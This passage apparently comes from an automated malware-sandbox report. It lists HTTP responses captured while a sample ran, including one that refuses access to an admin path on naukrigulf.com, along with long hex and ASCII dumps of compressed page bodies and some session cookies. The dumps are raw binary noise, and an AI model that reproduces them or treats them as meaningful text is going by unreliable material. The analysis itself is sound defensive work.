a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:16:22 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I2xtjoY%2Bq6xVLdfqYqsmnDYxYp8SBSIYWvjLVaMgEtPOaG0I%2B9KfzttJbnHyOnKHyPtD5vvqHIUSRYDLYghBFfklgCocaRML8bWJXNa%2FObp8bhVqxhB97hoeF13wXHh2YA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abd499f1b677b-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f db 38 12 fd df 9f 62 a2 03 12 1b b0 a4 b8 db 6e 12 47 d6 61 af cd 01 01 7a d8 ee 36 c5 5d b1 28 02 8a 1c 59 dc 50 a4 8e a4 ac 18 b9 7c f7 05 45 c9 96 7f 24 7b c5 1d 10 20 a2 38 7c 33 f3 f8 66 44 3a 39 f9 f0 f3 fb bb af 9f 6e a0 b0 a5 48 47 c9 49 18 fe c6 73 10 16 6e 6f e0 e2 5b 0a 89 9b 00 2a 88 31 8b 40 aa f0 77 03 1c 7f 04 25 18 c7 00 04 91 cb 45 80 32 fc f2 39 48 21 39 f9 0d 25 e3 f9 b7 30 dc 42 75 38 00 c7 a1 2e be 0f ea f2 15 a8 cb ef 80 5a da 0e cd bd 38 96 e5 21 4a 18 ee 22 15 48 58 3a 4a 2c b7 02 d3 9f ac 45 69 b9 92 f0 2b fe bb e6 1a d9 09 fc 07 de 0b 55 b3 5c 10 8d 49 ec ed 46 49 89 96 00 2d 88 36 68 17 c1 97 bb bf 87 97 01 c4 fd 44 61 6d 15 3a 84 d5 22 78 af a4 03 0d ef d6 15 06 40 fd 68 11 58 7c b4 b1 8b f7 7a 03 f3 1a ca bf c2 2f 3f 85 ef 55 59 11 cb 33 31 04 ba bd 59 dc b0 25 0e d6 49 52 e2 22 d0 2a 53 d6 0c 0c a5 e2 92 e1 e3 14 a4 ca 95 10 aa 39 58 b2 e2 d8 54 4a db c1 a2 86 33 5b 2c 18 ae 38 c5 b0 1d 4c b9 e4 96 13 11 1a 4a 04 2e 66 1e 45 70 f9 00 1a c5 22 30 76 2d d0 14 88 36 00 ce 16 01 cd ef fd ab 90 1a 13 40 a1 31 5f 04 31 65 32 a4 4b 1e fb a9 98 e6 11 6a ad b4 89 5a a3 78 5f c3 57 df d2 97 5d 9c 6d 5d 70 74 5e ce fe d4 0b c7 de d1 ae 1a 5a c3 34 53 6c fd 54 12 bd e4 72 7e 7e 5d 11 c6 b8 5c ce cf 9f 13 0f 94 8e 46 03 05 a2 8b 6f 76 de 69 70 94 18 aa 79 65 d3 11 00 cf 61 7c 22 c9 8a 2f 89 55 3a a2 4a 3d 70 bc 91 24 13 c8 26 f0 34 72 25 d0 70 c9 54 13 11 c6 6e 56 28 ed 47 6e 2c 4a d4 e3 b3 0f 3f ff a3 53 ce 47 45 18 b2 b3 29 e4 b5 a4 ad 38 c7 fd 6a 80 15 d1 d0 01 0b 58 00 53 b4 2e 51 da 68 89 f6 46 a0 7b fc db fa 96 8d cf bc 4d 48 04 6a 7b 36 b9 ee 56 Data Ascii: 6c9Xo8bnGaz6](YP|E${ 8|3fD:9nHGIsno[*1@w%E29H!9%0Bu8.Z8!J"HX:J,Ei+U\IFI-6hDam:"x@hX|z/?UY31Y%IR"*S9XTJ3[,8LJ.fEp"0v-6@1_1e2KjZx_W]m]pt^Z4SlTr~~]\Fovipyea|"/U:J=p$&4r%pTnV(Gn,J?SGE)8jXS.QhF{MHj{6V
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:16:22 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WShCCdEuIoeCetWXsBDmiHGqYSfQsGOsaR5pdJeyJbadfBSi7w%2FXKID1Y16zzUK7qxGwUAJLV%2F4LZLr7Dufyfj0LPNMn93Qpr8Co4RmCopJsxj3JBVyMmp5m2oCYrXMqZQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abd499b504576-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f e3 b8 11 fe ee 5f 31 51 81 c4 06 2c c9 de 4b 2e 6f b2 8a eb 6e 0a 04 d8 e2 f6 6e b3 68 17 87 45 40 91 23 8b 17 8a 54 49 ca 8a 91 e6 bf 1f 28 4a 8e fc 92 5c 17 2d 10 20 a2 38 7c 66 e6 e1 33 23 d2 c9 d1 87 9f df df 7d fd 74 03 85 2d 45 3a 4a 8e c2 f0 37 9e 83 b0 70 7b 03 e7 df 52 48 dc 04 50 41 8c 59 04 52 85 bf 1b e0 f8 23 28 c1 38 06 20 88 5c 2e 02 94 e1 97 cf 41 0a c9 d1 6f 28 19 cf bf 85 e1 0b 54 87 03 70 18 ea fc fb a0 2e de 80 ba f8 0e a8 a5 ed d0 dc 8b 43 59 ee a3 84 e1 36 52 81 84 a5 a3 c4 72 2b 30 fd c9 5a 94 96 2b 09 bf e2 bf 6b ae 91 1d c1 7f e0 bd 50 35 cb 05 d1 98 c4 de 6e 94 94 68 09 d0 82 68 83 76 11 7c b9 fb 7b 78 11 40 dc 4f 14 d6 56 a1 43 58 2d 82 f7 4a 3a d0 f0 6e 5d 61 00 d4 8f 16 81 c5 47 1b bb 78 af 37 30 6f a1 fc 2b fc f2 53 f8 5e 95 15 b1 3c 13 43 a0 db 9b c5 0d 5b e2 60 9d 24 25 2e 02 ad 32 65 cd c0 50 2a 2e 19 3e 4e 41 aa 5c 09 a1 9a bd 25 2b 8e 4d a5 b4 1d 2c 6a 38 b3 c5 82 e1 8a 53 0c db c1 94 4b 6e 39 11 a1 a1 44 e0 62 ee 51 04 97 0f a0 51 2c 02 63 d7 02 4d 81 68 03 e0 6c 11 d0 fc de bf 0a a9 31 01 14 1a f3 45 10 53 26 43 ba e4 b1 9f 8a 69 1e a1 d6 4a 9b a8 35 8a 77 35 7c f9 2d 7d dd c5 c9 8b 0b 8e ce cb c9 9f 7a e1 d8 3b da 56 43 6b 98 66 8a ad 9f 4a a2 97 5c 5e cd ae 2b c2 18 97 cb ab d9 73 e2 81 d2 d1 68 a0 40 74 f1 cd 67 9d 06 47 89 a1 9a 57 36 1d 01 f0 1c c6 47 92 ac f8 92 58 a5 23 aa d4 03 c7 1b 49 32 81 6c 02 4f 23 57 02 0d 97 4c 35 11 61 ec 66 85 d2 7e e4 c6 a2 44 3d 3e f9 f0 f3 3f 3a e5 7c 54 84 21 3b 99 42 5e 4b da 8a 73 dc af 06 58 11 0d 1d b0 80 05 30 45 eb 12 a5 8d 96 68 6f 04 ba c7 bf ad 6f d9 f8 c4 db 84 44 a0 b6 27 93 eb 6e 75 bf 32 Data Ascii: 6c9Xmo_1Q,K.onnhE@#TI(J\- 8|f3#}t-E:J7p{RHPAYR#(8 \.Ao(Tp.CY6Rr+0Z+kP5nhhv|{x@OVCX-J:n]aGx70o+S^<C[`$%.2eP*.>NA\%+M,j8SKn9DbQQ,cMhl1ES&CiJ5w5|-}z;VCkfJ\^+sh@tgGW6GX#I2lO#WL5af~D=>?:|T!;B^KsX0EhooD'nu2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-alivex-zone: 3-reserve101-ded7160CF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=MGzIcCHX4eKZdDwJDLWZxYq.eJQj2PLKrao.hMK0QLk-1707131767-1-AU9osYYGrdr2/kgnmMBLWJTNZX/3l+Z8EANxGU2bUm9wb1MeO4yIXLO1wblwe3Vwt7YTFtM8eBc26qPfWYy3O8E=; path=/; expires=Mon, 05-Feb-24 11:46:07 GMT; domain=.bongacams.com; HttpOnly; SameSite=NoneServer: cloudflareCF-RAY: 850abd494a026783-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 00 00 ff ff 03 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 73(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: nginx/1.17.9X-Powered-By: PHP/8.2.4Set-Cookie: osCsid=c947e848ab0945a957bb6a68b5fec71d; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: osCsid=c947e848ab0945a957bb6a68b5fec71d; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=Nonex-imvu-rnd: lojRQpAHBgcontent-language: pt-brContent-Encoding: gzipData Raw: 31 32 33 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 3b db 6e db 48 96 ef 06 e6 1f aa 99 ee 96 d4 23 8a d4 c5 b2 24 db 1a c8 97 5c 76 12 27 1b 27 99 1e 64 03 a3 48 16 25 3a 24 8b 61 15 6d b9 3d f9 98 c1 3e 0c 66 81 7d 1a ec cb be fa c7 f6 9c 22 29 91 12 95 d8 dd 4a 63 4d c8 2a d7 e5 dc 6f 55 2c 1f 7c 77 f2 f2 f8 cd 5f 5f 9d 92 99 0c fc f1 c1 77 ba fe de 73 c9 b3 53 32 f8 30 26 f9 cf 01 0e 12 c7 8b 0f 35 5f c6 1a f1 69 38 3d d4 58 a8 bf 3d d7 88 ed 53 21 0e 35 8f 0d b4 31 39 f8 ee 3d 0b 1d cf fd a0 eb 45 60 c3 07 03 1b 6e 00 36 95 19 3c ec 18 57 c3 8a a4 6e c5 6a bd ae 17 61 ec 1c cc 18 75 c6 3b 8a 8a 80 49 0a 4c cb 48 67 9f 12 ef ea 50 fb 59 7f 3b d1 8f 79 10 51 e9 59 3e 03 5a 78 28 59 28 0f b5 67 a7 87 cc 99 42 8f b1 69 ed 71 3a 55 7f 73 13 15 17 4a 36 97 06 92 b8 4f ec 19 8d 05 93 87 6f df 3c d6 07 2b 90 42 1a b0 43 8d 46 91 cf 74 4f 26 21 13 3a fc 51 80 03 7f e9 9e 73 38 6c 0f f7 7a bb 83 5e af 49 b0 87 c6 d3 24 c0 71 a4 44 8c 0c 23 92 2d c1 ec 24 66 2d 2f b8 4a 5a 36 0f 8c 10 29 f8 93 e0 49 6c b3 43 8b 86 21 8b 15 f2 22 e2 29 e7 53 c0 1c f9 f4 a6 1a 2f 00 4a 21 06 dc f2 7c 66 f3 d8 e1 57 74 0d 4e ca 40 3a 47 bf 66 16 02 d3 6d 1a d1 b2 34 6f 98 b8 df 52 21 a9 4c 84 6e d1 18 9a 37 25 18 96 4f ed 8f ba 8c 69 28 fc c4 86 ae ff 87 c4 f8 5e f8 91 c4 cc cf 01 4a 9e d8 33 dd 83 65 1a 11 de 2f 0c cc 7c 77 6f be bb a7 91 59 cc dc 43 0d b5 08 4a 5c d5 20 7c 02 1e 1a d7 9e 9c 05 cc f0 82 a9 e1 d2 2b 84 62 ac 82 d5 15 b8 56 14 4e ef 4d 40 df 9c f7 cd ed 11 a0 c0 3d 88 80 bd ce 7c af b3 3d 02 14 b8 87 11 d0 9f ef f5 b7 48 00 82 7b 10 01 ed 76 6f 0e 9f ed 91 90 01 7c 18 11 1d 73 0e 9f 2d 12 91 02 7c Data Ascii: 123d;nH#$\v''dH%:$am=>f}")JcM*oU,|w__wsS20&5_i8=X=S!519=E`n6<Wnjau;ILHgPY;yQY>Zx(Y(gBiq:UsJ6Oo<+BCFtO&!:Qs8lz^I$qD#-$f-/JZ6)IlC!")S/J!|fWtN@:Gfm4oR!Ln7%Oi(^J3e/|woYCJ\ |+bVNM@=|=H{vo|s-|
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: MEGA-Chrome-AntileakAccess-Control-Max-Age: 86400Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:07 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 850abd49be49adcf-ATLContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo|qF|<
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: AkamaiGHostMime-Version: 1.0Content-Type: text/htmlContent-Length: 269Expires: Mon, 05 Feb 2024 11:16:07 GMTDate: Mon, 05 Feb 2024 11:16:07 GMTConnection: closeServer-Timing: cdn-cache; desc=HITServer-Timing: edge; dur=1Server-Timing: ak_p; desc="1707131767601_1611129006_213793893_11_11593_136_0_-";dur=1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 48 31 3e 0a 20 0a 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 6e 61 75 6b 72 69 67 75 6c 66 26 23 34 36 3b 63 6f 6d 26 23 34 37 3b 61 64 6d 69 6e 26 23 34 37 3b 22 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 38 26 23 34 36 3b 61 65 65 30 30 37 36 30 26 23 34 36 3b 31 37 30 37 31 33 31 37 36 37 26 23 34 36 3b 63 62 65 33 63 36 35 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;admin&#47;" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131767&#46;cbe3c65</BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:07 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Thu, 06 Oct 2022 20:52:18 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.0X-Powered-By: ASP.NETAccess-Control-Allow-Origin: *Date: Mon, 05 Feb 2024 11:16:06 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 